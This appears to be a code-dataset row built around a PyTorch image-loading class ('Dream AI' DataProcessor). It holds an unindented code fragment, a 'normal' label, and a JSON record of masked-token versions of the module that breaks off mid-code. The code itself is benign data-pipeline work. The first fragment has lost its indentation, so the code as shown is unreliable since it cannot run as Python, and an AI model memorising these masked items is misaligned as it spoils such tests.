tta_tfms = None
if not bal_tfms:
bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None,
self.test_name: None
}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
# resize_transform = transforms.RandomResizedCrop(s[0])
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [
resize_transform,
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
else:
tfms_temp = [
resize_transform,
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {
self.tr_name: tfms,
self.val_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
],
self.test_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)
self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)
data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std
data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std
data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])
for x in [self.tr_name, self.val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj)
for x in [self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,
shuffle=True, num_workers=num_workers)
for x in [self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}
self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,
dataset_sizes)
return image_datasets,dataloaders,dataset_sizes
def imshow(self,inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self,inp,calculate = False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self,folder_name = 'train', size = (64,64), bs = 5):
self.get_data(size,bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0],batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
# def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):
# # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'
# # .format(anc_grids,anc_zooms,anc_ratios))
# # print('If so, you may call the function "set_up_object_detection" with your own paramteres.')
# cmap = get_cmap(num_colr)
# self.colr_list = [cmap(float(x)) for x in range(num_colr)]
# self.num_colr = num_colr
# self.create_anchors(anc_grids,anc_zooms,anc_ratios)
# self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)
# self.loss_f = FocalLoss(self.num_classes)
# def create_anchors(self,anc_grids,anc_zooms,anc_ratios):
# anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]
# k = len(anchor_scales)
# anc_offsets = [1/(o*2) for o in anc_grids]
# anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)
# anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])
# grid_sizes = torch.tensor(np.concatenate([np.array(
# [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])).float().unsqueeze(1).to(self.device)
# anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)
# anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])
# self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k
|
normal
|
{
"blob_id": "5b8c95354f8b27eff8226ace52ab9e97f98ae217",
"index": 80,
"step-1": "<mask token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<mask token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n",
"step-2": "<mask token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\n<mask token>\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\n<mask token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n 